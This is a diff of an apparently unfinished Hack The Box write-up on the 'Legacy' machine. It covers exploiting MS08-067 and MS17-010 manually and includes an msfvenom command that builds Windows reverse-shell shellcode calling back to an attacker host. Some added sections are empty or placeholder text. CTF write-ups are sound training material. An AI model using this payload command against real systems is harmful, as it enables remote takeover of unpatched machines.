0xCGonzalo/HtB-Write-Ups/Machines/Legacy/WriteUp.md

 # 03: Vulnerability Analysis

-Both of these vulnerabilities (MS08-067 & MS-17-010) gives a shell as system and each one have a metasploit module for exploit easily but i will show how exploit this manually.
+Both of these vulnerabilities (MS-08-067 & MS-17-010) gives a shell as system and each one have a metasploit module for exploit easily but i will show how exploit this manually.

 # 04: Exploitation

-## MS08-067
+## MS-08-067

 I will use [this exploit](https://github.com/andyacer/ms08_067) for exploit the vulnerability, this script requires impacket and replace the default shellcode with some of my own.
 Ok, to make the shellcode i used *msfvenom*:

 `
 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
 `

+The parameters are:

+`
+p:

+LHOST:

+LPORT:

+EXITFUNC:

+b:

+f:

+v:

+a:

+platform:

+`

+## MS-17-010

+asdasdasd

 # 05: Post-Exploitation